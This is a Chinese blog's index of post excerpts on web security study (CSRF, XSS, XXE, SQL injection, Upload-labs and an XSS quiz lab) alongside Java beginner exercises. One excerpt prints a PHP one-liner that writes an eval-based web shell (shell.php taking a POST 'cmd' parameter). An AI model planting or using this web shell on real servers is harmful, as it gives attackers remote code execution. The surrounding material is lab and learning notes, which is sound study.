摘要:
5-1CSRF原理介绍1)CSRF漏洞定义跨站请求伪造XSS与CSRF区别:1、XSS利用站点内的信任用户,盗取cookie;2、CSRF通过伪装成受信任的用户请求受信任的网站。2)CSRF漏洞原理利用目标用户的合法身份,以目标用户的名义执行某些非法操作。例如:简单转账案例初始化链接:http:// 阅读全文
2020年12月22日
2020年12月17日
摘要:
1、CSRF 和 XSS 和 XXE 有什么区别,以及修复方式? 1)XSS跨站点脚本攻击 XSS是跨站脚本攻击,用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。 修复方式:对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与W 阅读全文
2020年12月15日
摘要:
1)Demo01ShuXu.java 2)Demo02If 3)Demo03IfTest 4)Demo04IfTest 5)Demo05IfElseTest 6)Demo06ElseIf 7)Demo07ElseIfTest 8)Demo08XuanZeTest 9)Demo09IfToSanYua 阅读全文
2020年12月9日
摘要:
1)Demo01DataType.java 2)Demo02DataType.java 3)Demo03DataType.java 4)Demo04SuanShu.java 5) Demo05SuanShuPlus.java 6)Demo06SuanShu.java 7)Demo07FuZhi.ja 阅读全文
2020年12月7日
摘要:
1)HelloWorld.java 2)ChangLiang.java 3)Demo02BianLiang.java 4)Demo03BianLiang.java 阅读全文
2020年11月16日
摘要:
2-1 SQL注入原理1)语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后再运行时直接由使用该语言的计算机执行这些指令。在解释型语言中,如果程序与用户进行交互。用户就可以构造特殊的输入来拼 阅读全文
2020年10月17日
摘要:
快速查找我 <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])>');?> 阅读全文
摘要:
Upload-labs靶场 Pass-01:一、绕过JS验证1、BurpSuite剔除响应JS 对于JS前端验证,直接删除掉JS代码之后就可以绕过JS验证。 BurpSuite中Proxy-->Options-->Remove all JavaScript2、浏览器审计工具剔除JS 利用浏览器的审查 阅读全文
摘要:
靶机地址:https://xss-quiz.int21h.jp/ XSS漏洞发现:设置独一无二字符串提交,在响应中查找。 定义和用法onmouseover 属性在鼠标指针移动到元素上时触发。注释:onmouseover 属性不适用以下元素:<base>、<bdo>、<br>、<head>、<html 阅读全文
2019年3月10日
